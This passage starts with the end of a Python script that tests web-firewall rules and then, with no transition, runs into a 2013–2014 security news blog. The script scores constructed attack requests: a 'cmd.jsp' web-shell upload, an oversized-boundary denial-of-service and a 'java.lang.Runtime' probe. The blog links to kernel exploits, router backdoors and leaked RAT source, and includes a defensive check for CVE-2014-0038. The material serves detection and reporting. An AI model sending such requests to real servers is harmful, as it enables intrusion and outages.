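            elif key == 's':                       # "$UWA:8" -> ('$UWA', 8)
                name, _, pts = val.partition(':')
                rule['score'] = (name, int(pts))
        rules.append(rule)
    return rules


def zone_values(request, zone):
    """Strings that would be inspected for one match zone of a request."""
    if zone == 'URL':
        return [request.get('url', '')]
    if zone == 'ARGS':                             # query-string names and values
        return [s for kv in request.get('args', {}).items() for s in kv]
    if zone == 'BODY':                             # POST body names and values
        return [s for kv in request.get('body', {}).items() for s in kv]
    if zone == 'FILE_EXT':                         # uploaded file names
        return request.get('files', [])
    if zone.startswith('$HEADERS_VAR:'):
        want = zone.split(':', 1)[1].strip().lower()
        return [v for k, v in request.get('headers', {}).items() if k.lower() == want]
    return []


def evaluate(request, rules=None):
    """Return (fired rule ids, score dict) for one request."""
    fired, scores = [], {}
    for rule in rules or parse_rules():
        for zone in rule['zones']:
            if any(rule['test'](s) for s in zone_values(request, zone)):
                fired.append(rule['id'])
                name, pts = rule['score']
                scores[name] = scores.get(name, 0) + pts
                break                              # count each rule once per request
    return fired, scores


def blocked(scores):
    return any(scores.get(n, 0) >= t for n, t in BLOCK_THRESHOLDS.items())


# Constructed sample requests.
JSP_UPLOAD = {'url': '/admin/upload', 'files': ['cmd.jsp'],
              'headers': {'Content-Type': 'multipart/form-data; boundary=----abc123'}}
BOUNDARY_DOS = {'url': '/upload',
                'headers': {'content-type': 'multipart/form-data; boundary=' + 'A' * 4096}}
WLS_PROBE = {'url': '/app/wls_internal/x', 'args': {'cmd': 'java.lang.Runtime'}}
BENIGN = {'url': '/index.html', 'args': {'q': 'hello world'},
          'headers': {'Content-Type': 'application/x-www-form-urlencoded'}}

if __name__ == '__main__':
    for name, req in [('jsp upload', JSP_UPLOAD), ('boundary dos', BOUNDARY_DOS),
                      ('wls probe', WLS_PROBE), ('benign', BENIGN)]:
        fired, scores = evaluate(req)
        print(f'{name:13s} fired={fired} scores={scores} block={blocked(scores)}')
```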



How I hacked Github again by Egor Homakov

2014.02.08

A story about love, romance, and how Egor Homakov, by combining 5 simple, non-critical security holes, put together a serious exploit that let him take over accounts and gain access to private repositories.

GitHub has confirmed and already closed the holes and awarded Egor the highest bounties so far from its new bug bounty programme.

More info:




Book: Bulletproof SSL/TLS and PKI by Ivan Ristić available in excerpts and for pre-order

2014.02.05

Ivan Ristić's new book, "Bulletproof SSL/TLS and PKI", is available now in excerpts and for pre-order via Feisty Duck. [1]

The largest part of the book, roughly 60% at almost 200 pages, is already finished and is available to read and download as PDF, EPUB, Kindle/Mobi and an online version. The part released now mainly covers practice and deployment; a complete table of contents can be found at [3].

The following chapters are available (quotes from the announcement [2]):

  • Chapter 10, OpenSSL Cookbook: describes the most frequently used OpenSSL functionality, largely focusing on installation, configuration, and key and certificate management.
  • Chapter 11, Testing with OpenSSL: continues with OpenSSL and explains how to use its command-line tools to test server configuration. Even though it is often much easier to use an automated tool for testing (e.g., the SSL Labs Server Test), OpenSSL remains the de facto standard for troubleshooting.
  • Chapter 12, Configuring Apache: discusses the SSL configuration of Apache httpd.
  • Chapter 13, Configuring Java and Tomcat: covers the current versions of Java and Tomcat, and gives a glimpse of what's coming in Java 8. (Java 8 coverage will improve soon after Oracle makes the final release candidate available.)
  • Chapter 14, Configuring Microsoft Windows and IIS: discusses the Microsoft Windows platform and the Internet Information Server.
  • Chapter 15, Configuring Nginx: discusses the Nginx web server, covering the features in the stable and development version equally.
  • Appendix, SSL/TLS Deployment Best Practices: serves as a temporary replacement for the yet-to-be-written Chapter 6, Deployment. It covers the same material and gives the same advice, only in fewer words.

References

  1. Bulletproof SSL/TLS and PKI Preorder @ FeistyDuck
  2. News: Bulletproof SSL/TLS and PKI available for early access and preorder
  3. Bulletproof SSL/TLS and PKI: Early Access TOC and Preface



Cookie Bomb or lets break the Internet.

2014.02.03

Interesting Blogpost by Egor Homakov on how to break global CDNs for Users:

"TL;DR I can craft a page "polluting" CDNs, blogging platforms and other major networks with my cookies. Your browser will keep sending those cookies and servers will reject the requests, because Cookie header will be very long. The entire Internet will look down to you. "

read more @ Cookie Bomb or lets break the Internet




Whoop, there it is! Linux local root exploit for CVE-2014-0038 ( CONFIG_X86_X32=y )

2014.02.03

Three days after a critical vulnerability in the Linux kernel became public [1], matching exploits have now been published on GitHub [2,7]; the corresponding reddit discussion can be found at [3].

Affected are kernels > 3.4 with the 32-bit subsystem (CONFIG_X86_X32) enabled; Ubuntu is the only mainline distribution that ships with this feature enabled (13.10 and 12.04 LTS); updates are already available [4-6].
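A defender's check for the configuration described above, added here as an example and not taken from the original post or the linked exploit code: it reports whether a host runs a 3.4+ kernel with CONFIG_X86_X32=y. The function names and the sample config contents are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post: check whether a Linux host matches the
# affected configuration named above (kernel 3.4 or newer with CONFIG_X86_X32=y).
# Function names and the sample config file contents are constructed for illustration.

# Return 0 when kernel release string $1 (e.g. "3.11.0-15-generic") is 3.4 or newer.
kernel_at_least_3_4() {
    maj=$(printf '%s' "$1" | cut -d. -f1)
    min=$(printf '%s' "$1" | cut -d. -f2 | sed 's/[^0-9].*//')
    [ "${maj:-0}" -gt 3 ] || { [ "${maj:-0}" -eq 3 ] && [ "${min:-0}" -ge 4 ]; }
}

# Return 0 when the kernel config file $1 enables the x32 ABI.
x32_enabled() {
    grep -q '^CONFIG_X86_X32=y' "$1"
}

# Return 0 (affected configuration) only when both conditions hold.
# $1 = kernel release string, $2 = path to the kernel config file.
host_affected() {
    kernel_at_least_3_4 "$1" && x32_enabled "$2"
}

# Self-check against a constructed config, then look at the running host.
sample=$(mktemp)
printf 'CONFIG_X86_64=y\nCONFIG_X86_X32=y\n' > "$sample"
if host_affected "3.11.0-15-generic" "$sample"; then
    echo "constructed sample: affected configuration"
fi
rm -f "$sample"

rel=$(uname -r)
cfg="/boot/config-$rel"
if [ ! -r "$cfg" ] && [ -r /proc/config.gz ]; then
    cfg=$(mktemp) && zcat /proc/config.gz > "$cfg"
fi
if [ -r "$cfg" ]; then
    if host_affected "$rel" "$cfg"; then
        echo "$rel: CONFIG_X86_X32=y on a 3.4+ kernel, verify the distribution fix is installed"
    else
        echo "$rel: not in the affected configuration"
    fi
else
    echo "$rel: no kernel config found, cannot decide"
fi
```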


References

  1. Linux 3.4+: arbitrary write with CONFIG_X86_X32 (CVE-2014-0038) @ ossec
  2. saelo / cve-2014-0038
  3. reddit: Linux local root exploit for CVE-2014-0038
  4. 13.10 / USN-2096-1: Linux kernel vulnerability
  5. 12.04 / USN-2094-1: Linux kernel (Raring HWE) vulnerability
  6. 12.04 / USN-2095-1: Linux kernel (Saucy HWE) vulnerability
  7. pastebin / recvmmsg.c



XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers

2014.01.23

A severe Facebook bug led to remote code execution on Facebook servers; the problem was fixed by a hotfix within 3 hours and the largest bug bounty to date was awarded.

More details are given in the following blog post by the finder of the vulnerability, Reginaldo Silva: XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers

More information on Facebook's reaction and acknowledgement of the bug here: Facebook Bug Bounty on the topic ($33,000)




LINKSYS & NETGEAR Backdoor by the Numbers

2014.01.22

From the Blog:

"On January first, Eloi Vanderbeken posted his findings on a backdoor that listens on TCP port 32764. The backdoor appears to affect older versions of Netgear and Linksys routers but some users are also reporting that other brands are also affected by the backdoor. Eloi was also able to write a python script that had the ability to check for the vulnerability among other functions.

...

This is where the real data comes in. My first thought was "Oh man, here comes the part where we get to tell the world 400,000 routers are vulnerable RIGHT NOW!" The results were actually quite surprising. It turns out that only 4,998 routers were exposed and vulnerable."

A similar result, but with a different distribution among countries, from quarkslab.com: "In the end, we found about 6500 routers running this backdoor.", from "TCP backdoor 32764 or how we could patch the Internet (or part of it ;))"





SSL Labs: stricter requirements from 2014

2014.01.22

SSL Labs and the SSL Rating Guide have been released in new versions and adapted to current requirements.

New rating classes (A+ / A-) allow finer-grained results; insecure settings (use of MD5 in cipher suites, key length < 1024 bit) are punished with an F rating; TLS 1.2 is now required to obtain an A rating.

More information and a list of all changes can be found in Ivan Ristic's blog post.





I Know You Need New Toner

2014.01.15

Global map of public printers, via Shodan

[Image: printers by Shodan]





Exploit Database published on GitHub

2014.01.13


Offensive Security's Exploit Database, previously available online at exploit-db.com and as an offline version in Kali Linux, has been published on GitHub as a file archive and CSV data dump; new exploits appear at the same time as the updates on exploit-db.com.





Prolexic Q3 2013 Global DDoS Attack Report

2014.01.12

Source: Prolexic Knowledge Center DDoS Attack Report Q3 2013 Attack-Type Metrics Infographic

Q3 2013 Global DDoS Attack Report - Attack Type Metrics

In Q3 2013, malicious actors shifted to reflection and amplification (DrDoS) attacks to launch more powerful attacks with fewer resources. This graphical analysis of attacks against Prolexic’s global client base showed an increase in reflection attacks and UDP floods and a decline in the use of SYN floods.

The Q3 2013 global DDoS attack trends infographic also shows:

  • Infrastructure layer (Layer 3 and 4) DDoS attacks are more popular than application layer DDoS attacks (Layer 7)
  • CHARGEN-based DDoS attacks are on the rise
  • SYN floods are the more popular DDoS attack type
  • Reflection DDoS attacks increased 69 percent
  • Statistical breakdowns of DDoS attacks by attack vector, including SSL, HTTP, POST, GET, ACK, CHARGEN, UDP, SYN and ICMP





Dual_Ec_Drbg backdoor: a proof of concept

2014.01.12

"Dual_EC_DRBG is a pseudo-random number generator promoted by NIST in NIST SP 800-90A and created by NSA. This algorithm is problematic because it has been made mandatory by the FIPS norm (and should be implemented in every FIPS approved software) and some vendors even promoted this algorithm as first source of randomness in their applications. edit: I've been told it's not the case anymore in FIPS-140-2 but the cat is already out of the bag

If you still believe Dual_EC_DRBG was not backdoored on purpose, please keep reading. In 2007 already, Dan Shumow and Niels Ferguson from Microsoft showed that Dual_EC_DRBG algorithm could be backdoored. Twitter also uncovered recently that this algorithm was even patented in 2004 by Dan Brown (Not the Da Vinci guy, the Certicom one) as a “key escrow mechanism” (government jargon/lingo for trapdoor/backdoor). I will go a little bit further in explaining how it works and give a proof-of-concept code, based on OpenSSL FIPS. This is in the best of my knowledge the only public proof of concept published today. "





How's My SSL? SSL browser test

2014.01.09

How's My SSL? is a cute little website that tells you how secure your TLS client is. TLS clients just like the browser you're reading this with.





A Forensic Overview of a Linux perlbot

2014.01.08

"It's fairly old news that exploit attempts against PHP, ColdFusion, and Content Management Systems are quite common these days. Most of these attempts target old vulnerabilities, hoping to hit enough neglected servers to make it worthwhile. In some cases, a particular exploit may succeed against a high value server, leading to some pretty significant data leakage. In others, the attacker is going for volume, where they can make use of a large number of compromised hosts.

I recently noticed a PHP exploit attempt coming from several HK and CN IP addresses, so I allowed the exploit on my honeypot and documented the results. The resulting activity was very reminiscent of the early botnet days, with IRC Command and Control, as well as the use of the compromised host as a scanning tool."

Read more @ Andre M. DiMino's blog: A Forensic Overview of a Linux perlbot




Scanning the Internet: Nmap's Favicon Map

2014.01.08

"The Nmap Project is pleased to release our new and improved Icons of the Web project! Since our free and open source Nmap Security Scanner software is all about exploring networks at massive scale, we started by scanning the top million web sites for 2013 (as ranked by the analytics company Alexa). We then downloaded each site's favicon—the small icon displayed next to a site title in browser bookmarks and tabs.

We scaled the icons in proportion to each site's monthly reach (popularity) and placed them in a giant collage. The smallest icons—for sites visited by only 0.00004% of the Internet population each month—are 256 pixels square (16x16). The largest icon (Google) is 394 million pixels. The whole collage is 5 gigapixels."

Src: nmap.org/favicon/


[Image: Nmap favicon map]




Domain typo finder

2014.01.08

Typofinder for domain typo discovery

Released as open source by NCC Group Plc - http://www.nccgroup.com/

A sample deployment can be found here:

http://www.zemes.com:8002/

Features

  • Domain to IP
  • MX records
  • A and AAAA
  • www address records
  • webmail address records
  • m address records
  • A keyboard map template system (currently UK supplied)
  • Geographic IP to flag
  • Google safe browsing integration
  • Bit flipping / squatting - http://dinaburg.org/bitsquatting.html
  • Whois



Internet-Wide Scan Data Repository

2014.01.08

The Internet-Wide Scan Data Repository is a public archive of research data collected through active scans of the public Internet. The repository is hosted by the ZMap Team at the University of Michigan and was founded in collaboration with Rapid7. We are happy to host scan data responsibly collected by all researchers. A JSON interface to the repository is available at https://scans.io/json.

... more ...




(IN)SECURE Magazine Issue 40: Exposing Malware

2013.12.03

TOC

  • How malware became the cyber threat it is today
  • Testing anti-malware products
  • Shoulder surfing via audio frequencies for XBox Live passwords
  • How to write Yara rules to detect malware
  • Report: HITBSecConf2013 Malaysia
  • Using Tshark for malware detection
  • 5 questions for the head of a malware research team
  • Beyond apps, beyond Android: 2013 mobile threat trends
  • Malware analysis on a shoestring budget
  • Report: Virus Bulletin 2013
  • Digital ship pirates: Researchers crack vessel tracking system
  • Exploring the challenges of malware analysis
  • Evading file-based sandboxes
  • Report: RSA Conference Europe 2013
  • Data security to protect PCI data flow

(IN)SECURE-Magazine Website

download ISSUE 40




Security Headers on the Top 1,000,000 Websites: November 2013 Report

2013.12.02

"It has been almost exactly a year since we conducted the first top 1 million security headers report so it is a great time to re-run the analysis and see how well security header adoption is growing. As before, the latest Chrome and Firefox User-Agent strings were used to make requests to the top 1 million sites over both HTTP and HTTPS. Out of the 2,589,918 responses we had over 100,000 distinct security headers and values to analyze."

Read more @ Veracode - Blog




Large-scale net traffic misdirections and MitM attacks detected

2013.11.28

By Renesys

Traffic interception has certainly been a hot topic in 2013. The world has been focused on interception carried out the old fashioned way, by getting into the right buildings and listening to the right cables. But there’s actually been a significant uptick this year in a completely different kind of attack, one that can be carried out by anybody, at a distance, using Internet route hijacking.

more: The New Threat: Targeted Internet Traffic Misdirection by Renesys

[Image: traffic redirection]




THOUSANDS of Ruby on Rails sites leave logins lying around

2013.11.28

By The Register

A security researcher has warned that a Ruby on Rails vulnerability first outlined in September is continuing to linger on the Web, courtesy of admins that don't realise a vulnerability exists in its default CookieStore session storage mechanism.

The weakness affects some big names, with the research turning up names like Warner Bros, Kickstarter, and the popular Tweet-aggregator tool Paper.li.

read more @ The Register

More information on the vulnerability is given in Security Bulletin 13.17 :: Lebenslänglich: Rails speichert SessionCookies ohne Verfallsdatum




Splinter RAT - source code of the botnet published

2013.11.28

reddit discussion about the source code of the Java-based Splinter botnet


Link: Splinter - The RAT | reddit




Reddit-AMA by Bruce Schneier

2013.11.28

My short bio: Bruce Schneier is an internationally renowned security technologist, called a "security guru" by The Economist. He is the author of 12 books -- including Liars and Outliers: Enabling the Trust Society Needs to Survive -- as well as hundreds of articles, essays, and academic papers. His influential newsletter "Crypto-Gram" and his blog "Schneier on Security" are read by over 250,000 people. He has testified before Congress, is a frequent guest on television and radio, has served on several government committees, and is regularly quoted in the press. Schneier is a fellow at the Berkman Center for Internet and Society at Harvard Law School, a program fellow at the New America Foundation's Open Technology Institute, a board member of the Electronic Frontier Foundation, an Advisory Board Member of the Electronic Privacy Information Center, and the Security Futurologist for BT -- formerly British Telecom.

Proof: https://www.schneier.com/blog/archives/2013/11/reddit_ask_me_a.html

Thank you all for your time and for coming by to ask me questions. Please visit my blog for more information and opinions.


Link: AMA by Bruce Schneier @ reddit

Note: AMA stands for "ask me anything".




Twitter finally accepts industry best practices by closing known security holes

2013.11.28

"As part of our continuing effort to keep our users’ information as secure as possible, we’re happy to announce that we recently enabled forward secrecy for traffic on twitter.com, api.twitter.com, and mobile.twitter.com." twitter.com / Forward Secrecy at Twitter


Credits for title: jjhare @ reddit




How Antisec Died

2013.11.27

Interesting article by Quinn Norton about Anonymous, Antisec, Jeremy Hammond, Sabu, and the intelligence-industrial complex.

Link: Article: How Antisec Died - Notes from a strange World




Digital Attack Map: watching DDoS attacks in real time

2013.10.21

Digital Attack Map is a real-time visualization of DDoS attacks worldwide. Historical data is provided as well, which allows individual events, DDoS sources and targets, and the related news to be examined.

The map was built in a collaboration between Arbor Networks and Google Ideas; a FAQ explains the background, the data sources and their scope.




Screenshots

[Image: Digital Attack Map]

[Image: Digital Attack Map - detail]

[Image: Digital Attack Map - by source and destination]



